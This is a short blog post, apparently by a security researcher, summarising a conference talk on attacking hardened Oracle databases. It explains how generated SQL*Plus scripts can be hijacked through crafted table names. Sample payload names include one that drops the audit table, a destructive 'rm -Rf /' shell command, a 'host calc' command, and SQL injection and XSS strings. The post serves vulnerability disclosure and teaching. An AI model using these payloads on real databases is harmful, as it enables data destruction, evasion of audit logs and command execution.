2 days ago I uploaded my HackInTheBox 2007 presentation “[1] Hacking Hardened and Patched Oracle Databases” from Malaysia. In this presentation I showed different ways how to hack patched and hardened databases, remove traces from audit tables, …

I explained for example that many SQL*Plus scripts (created on the fly via SPOOL or dbms_output) are vulnerable against SQL Injection. Such a script looks like:
———————-

set heading off
spool /export/home/oracle/drop.sql

select ‘drop table ‘||table_name||’ cascade constraints ;’ from dba_tables where owner=’RDS’;

spool off;

@/export/home/oracle/drop.sql

———————–

The problem with this script is that table_name is concatenated without input validation or the right usage of quotation characters. By creating a table called “sys.aud$” in the schema “RDS” it is possible to delete tables from another user (==> drop table sys.aud$) because SQL*Plus scripts are often generated and executed by a DBA user.

Instead of dropping tables it is even possible to run operating system commands (using the strings host,! or $, see [2] vulnerable sample script). SQL*Plus is interpreting the characters ! (Unix) and $ (Windows) as operating system call (= host command).

The following SQL statements are correct but sometimes there are side effects…:

———————–

create table ” ‘ or 1=1 –” (a varchar2(1));

create table “<script>alert(document.cookie)” (”</script>” varchar2(1));

create table “!rm -Rf /” (a varchar2(1));

create table “host calc” (a varchar2(1));

———————–